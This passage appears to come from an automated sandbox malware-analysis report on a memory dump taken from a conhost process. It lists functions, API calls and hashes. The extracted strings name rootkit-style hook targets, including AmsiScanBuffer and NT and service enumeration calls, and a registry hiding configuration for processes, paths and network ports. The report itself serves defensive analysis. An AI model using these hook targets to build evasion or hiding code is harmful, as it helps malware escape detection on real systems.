                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                  • String ID:
                                                                  • API String ID: 948135145-0
                                                                  • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction ID: 7a32dc024528bf182ba70241aa4d706cb4a0fc69ed4b47380085e6d64f5d3450
                                                                  • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction Fuzzy Hash: 87310C75658621DFEF549B26F9D03EA22E4BB86FC0F4450229F09876F6FF20C870A250

                                                                  Non-executed Functions

                                                                  Function 0000014ECB4A2BF4 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 205 14ecb4a2bf4-14ecb4a2c6d 207 14ecb4a2f88-14ecb4a2fab 205->207 208 14ecb4a2c73-14ecb4a2c79 205->208 208->207 209 14ecb4a2c7f-14ecb4a2c82 208->209 209->207 210 14ecb4a2c88-14ecb4a2c8b 209->210 210->207 211 14ecb4a2c91-14ecb4a2ca1 GetModuleHandleA 210->211 212 14ecb4a2cb5 211->212 213 14ecb4a2ca3-14ecb4a2cb3 GetProcAddress 211->213 214 14ecb4a2cb8-14ecb4a2cd6 212->214 213->214 214->207 216 14ecb4a2cdc-14ecb4a2cfb StrCmpNIW 214->216 216->207 217 14ecb4a2d01-14ecb4a2d05 216->217 217->207 218 14ecb4a2d0b-14ecb4a2d15 217->218 218->207 219 14ecb4a2d1b-14ecb4a2d22 218->219 219->207 220 14ecb4a2d28-14ecb4a2d3b 219->220 221 14ecb4a2d3d-14ecb4a2d49 220->221 222 14ecb4a2d4b 220->222 223 14ecb4a2d4e-14ecb4a2d52 221->223 222->223 224 14ecb4a2d54-14ecb4a2d60 223->224 225 14ecb4a2d62 223->225 226 14ecb4a2d65-14ecb4a2d6f 224->226 225->226 227 14ecb4a2e55-14ecb4a2e59 226->227 228 14ecb4a2d75-14ecb4a2d78 226->228 229 14ecb4a2f7a-14ecb4a2f82 227->229 230 14ecb4a2e5f-14ecb4a2e62 227->230 231 14ecb4a2d8a-14ecb4a2d94 228->231 232 14ecb4a2d7a-14ecb4a2d87 call 14ecb4a1934 228->232 229->207 229->220 235 14ecb4a2e64-14ecb4a2e70 call 14ecb4a1934 230->235 236 14ecb4a2e73-14ecb4a2e7d 230->236 233 14ecb4a2dc8-14ecb4a2dd2 231->233 234 14ecb4a2d96-14ecb4a2da3 231->234 232->231 239 14ecb4a2dd4-14ecb4a2de1 233->239 240 14ecb4a2e02-14ecb4a2e05 233->240 234->233 238 14ecb4a2da5-14ecb4a2db2 234->238 235->236 242 14ecb4a2ead-14ecb4a2eb0 236->242 243 14ecb4a2e7f-14ecb4a2e8c 236->243 247 14ecb4a2db5-14ecb4a2dbb 238->247 239->240 248 14ecb4a2de3-14ecb4a2df0 239->248 250 14ecb4a2e07-14ecb4a2e11 call 14ecb4a1bc8 240->250 251 14ecb4a2e13-14ecb4a2e20 lstrlenW 240->251 245 14ecb4a2ebd-14ecb4a2eca lstrlenW 242->245 246 14ecb4a2eb2-14ecb4a2ebb call 14ecb4a1bc8 242->246 243->242 252 14ecb4a2e8e-14ecb4a2e9b 243->252 256 14ecb4a2ecc-14ecb4a2edb call 14ecb4a1c00 245->256 257 14ecb4a2edd-14ecb4a2ee7 call 14ecb4a3c74 245->257 246->245 272 14ecb4a2ef2-14ecb4a2efd 246->272 254 14ecb4a2e4b-14ecb4a2e50 247->254 255 14ecb4a2dc1-14ecb4a2dc6 247->255 258 14ecb4a2df3-14ecb4a2df9 248->258 250->251 250->254 261 14ecb4a2e22-14ecb4a2e31 call 14ecb4a1c00 251->261 262 14ecb4a2e33-14ecb4a2e45 call 14ecb4a3c74 251->262 260 14ecb4a2e9e-14ecb4a2ea4 252->260 266 14ecb4a2eea-14ecb4a2eec 254->266 255->233 255->247 256->257 256->272 257->266 258->254 269 14ecb4a2dfb-14ecb4a2e00 258->269 271 14ecb4a2ea6-14ecb4a2eab 260->271 260->272 261->254 261->262 262->254 262->266 266->229 266->272 269->240 269->258 271->242 271->260 277 14ecb4a2eff-14ecb4a2f03 272->277 278 14ecb4a2f74-14ecb4a2f78 272->278 279 14ecb4a2f0b-14ecb4a2f25 call 14ecb4a89f0 277->279 280 14ecb4a2f05-14ecb4a2f09 277->280 278->229 282 14ecb4a2f28-14ecb4a2f2b 279->282 280->279 280->282 284 14ecb4a2f2d-14ecb4a2f4b call 14ecb4a89f0 282->284 285 14ecb4a2f4e-14ecb4a2f51 282->285 284->285 285->278 287 14ecb4a2f53-14ecb4a2f71 call 14ecb4a89f0 285->287 287->278
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                  • API String ID: 2119608203-3850299575
                                                                  • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction ID: 4f388541a52bfb4f60703e2e5d8c27f2900f96190d1984ecb4aa32e07d28edf5
                                                                  • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction Fuzzy Hash: 6CB16D72218AA19AEF688F25E4807EAB3E4F745B84F445016EF09537A5FB35CDA0F340
                                                                  Function 0000014ECB4A81C0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 3140674995-0
                                                                  • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction ID: 6fbefcaf485cb9dc5fe418880bbf24c2b2df2cab9ba06b1de959446b6214dfdb
                                                                  • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction Fuzzy Hash: 60310C72209B808AEB649F64F8907ED73A4F784744F44442ADB4E47BA9EF38C659D710
                                                                  Function 0000014ECB4AD6D4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 1239891234-0
                                                                  • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction ID: db69a238a6d7b3f22910f8c31ec01d1e7794a9ea190c68231ef74ad1bf075dc8
                                                                  • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction Fuzzy Hash: 09312C36218F908AEF649F25E8803DE77A4F788754F540115EB9D43BA8EF38C155CB00
                                                                  Function 0000014ECB4A1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                  • API String ID: 2135414181-2879589442
                                                                  • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction ID: 5a9201235556b3bf91605209e6aa2cd61929f2c0b5d065fa27b5caa8b2eba09a
                                                                  • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction Fuzzy Hash: 6871C236218E248AEF109F76F89169963A4FB99B88F401121DB4E97B79EF38C454E740
                                                                  Function 0000014ECB4A1D40 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 0000014ECB4A1D4B
                                                                    • Part of subcall function 0000014ECB4A20C4: GetModuleHandleA.KERNEL32(?,?,?,0000014ECB4A1D7D), ref: 0000014ECB4A20DC
                                                                    • Part of subcall function 0000014ECB4A20C4: GetProcAddress.KERNEL32(?,?,?,0000014ECB4A1D7D), ref: 0000014ECB4A20ED
                                                                    • Part of subcall function 0000014ECB4A5F60: GetCurrentThreadId.KERNEL32 ref: 0000014ECB4A5F9B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                  • API String ID: 4175298099-4225371247
                                                                  • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction ID: 47aeeedf48bfeabc12c2f3cd8babb1d97f81e015cc53dc3096e08498f736ffd6
                                                                  • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction Fuzzy Hash: 2B417FB420D96AA8EE08EF64F8D16D433A1B754744F8040A39B19531B6FFB8C66EF350
                                                                  Function 0000014ECB4A12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                  • String ID: d
                                                                  • API String ID: 2005889112-2564639436
                                                                  • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction ID: 53702bbeb9002f5d204152d610ce38fcce220dba3340c0a0fb60f77a1ede8992
                                                                  • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction Fuzzy Hash: 33512C32608B948AEB54CF66F4883AAB7E5F789B99F044124DB4947768EF3CC059DB00
                                                                  Function 0000014ECB476D40 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID: destructor'$ned$restrict(
                                                                  • API String ID: 190073905-924718728
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: 372f633f45d8badd2f531e4df6c139f49c394bd33ab720f9eae796c1a42d35ba
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: 9D81DF3171C3418EFE60AB69B8C13D922E5BBA5784F844025EB48A77B6FB39C845F750
                                                                  Function 0000014ECB4AD258 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 158 14ecb4ad258-14ecb4ad27a GetLastError 159 14ecb4ad299-14ecb4ad2a4 FlsSetValue 158->159 160 14ecb4ad27c-14ecb4ad287 FlsGetValue 158->160 161 14ecb4ad2a6-14ecb4ad2a9 159->161 162 14ecb4ad2ab-14ecb4ad2b0 159->162 163 14ecb4ad289-14ecb4ad291 160->163 164 14ecb4ad293 160->164 165 14ecb4ad305-14ecb4ad310 SetLastError 161->165 166 14ecb4ad2b5 call 14ecb4adafc 162->166 163->165 164->159 167 14ecb4ad325-14ecb4ad33b call 14ecb4acb78 165->167 168 14ecb4ad312-14ecb4ad324 165->168 169 14ecb4ad2ba-14ecb4ad2c6 166->169 180 14ecb4ad358-14ecb4ad363 FlsSetValue 167->180 181 14ecb4ad33d-14ecb4ad348 FlsGetValue 167->181 171 14ecb4ad2d8-14ecb4ad2e2 FlsSetValue 169->171 172 14ecb4ad2c8-14ecb4ad2cf FlsSetValue 169->172 175 14ecb4ad2f6-14ecb4ad300 call 14ecb4acfc4 call 14ecb4adb74 171->175 176 14ecb4ad2e4-14ecb4ad2f4 FlsSetValue 171->176 174 14ecb4ad2d1-14ecb4ad2d6 call 14ecb4adb74 172->174 174->161 175->165 176->174 186 14ecb4ad3c8-14ecb4ad3cf call 14ecb4acb78 180->186 187 14ecb4ad365-14ecb4ad36a 180->187 184 14ecb4ad34a-14ecb4ad34e 181->184 185 14ecb4ad352 181->185 184->186 190 14ecb4ad350 184->190 185->180 191 14ecb4ad36f call 14ecb4adafc 187->191 193 14ecb4ad3bf-14ecb4ad3c7 190->193 194 14ecb4ad374-14ecb4ad380 191->194 195 14ecb4ad392-14ecb4ad39c FlsSetValue 194->195 196 14ecb4ad382-14ecb4ad389 FlsSetValue 194->196 198 14ecb4ad3b0-14ecb4ad3b8 call 14ecb4acfc4 195->198 199 14ecb4ad39e-14ecb4ad3ae FlsSetValue 195->199 197 14ecb4ad38b-14ecb4ad390 call 14ecb4adb74 196->197 197->186 198->193 204 14ecb4ad3ba call 14ecb4adb74 198->204 199->197 204->193
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD267
                                                                  • FlsGetValue.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD27C
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD29D
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD2CA
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD2DB
                                                                  • FlsSetValue.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD2EC
                                                                  • SetLastError.KERNEL32(?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD307
                                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD33D
                                                                  • FlsSetValue.KERNEL32(?,?,00000001,0000014ECB4AF0FC,?,?,?,?,0000014ECB4AC3CF,?,?,?,?,?,0000014ECB4A7EE0), ref: 0000014ECB4AD35C
                                                                    • Part of subcall function 0000014ECB4ADAFC: HeapAlloc.KERNEL32(?,?,00000000,0000014ECB4AD432,?,?,?,0000014ECB4ADAE5,?,?,?,?,0000014ECB4ADBA8), ref: 0000014ECB4ADB51
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD384
                                                                    • Part of subcall function 0000014ECB4ADB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000014ECB4A643A), ref: 0000014ECB4ADB8A
                                                                    • Part of subcall function 0000014ECB4ADB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000014ECB4A643A), ref: 0000014ECB4ADB94
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD395
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014ECB4B0E9B,?,?,?,0000014ECB4B088C,?,?,?,0000014ECB4ACC7F), ref: 0000014ECB4AD3A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 570795689-0
                                                                  • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction ID: 3afad122a42d26c95b1bcd141777bf0a42c8ab63ae0f1ccf47be5cce483c4839
                                                                  • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction Fuzzy Hash: 44414C7424D2744EFEA8A72279D63E922C27B457B0F140724AB36466F6FF28C421A301
                                                                  Function 0000014ECB4A2FAC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                  • API String ID: 1943346504-1805530042
                                                                  • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction ID: 34e1cc155d4cb08fd5a148987c74d6271869945df2a0cc5037f88649c2e20446
                                                                  • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction Fuzzy Hash: FB318E32A08A508AFF20CF22B88479AF3E1F798B95F4441259F4993A79FF38C4659740
                                                                  Function 0000014ECB4A30BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                  • API String ID: 1943346504-3507739905
                                                                  • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction ID: 903c192c688e44d136104d3ea218b798d2fd8d8e175bf2d5a5ef689d170a7c7e
                                                                  • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction Fuzzy Hash: F2314A72618B518AFB50DF26B8C47AAA7E2F784F85F044125DF8A83735FF38C4559600
                                                                  Function 0000014ECB479D74 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction ID: 7a8466d11ce0ddfd2e321b9a51e282c6be336e6fc59198e4f91367a93320ea3f
                                                                  • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction Fuzzy Hash: 71E16972608B809EEF60DF65A4803ED77E0F755B98F100515EF89A7BAAEB34C580E741
                                                                  Function 0000014ECB4AA974 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
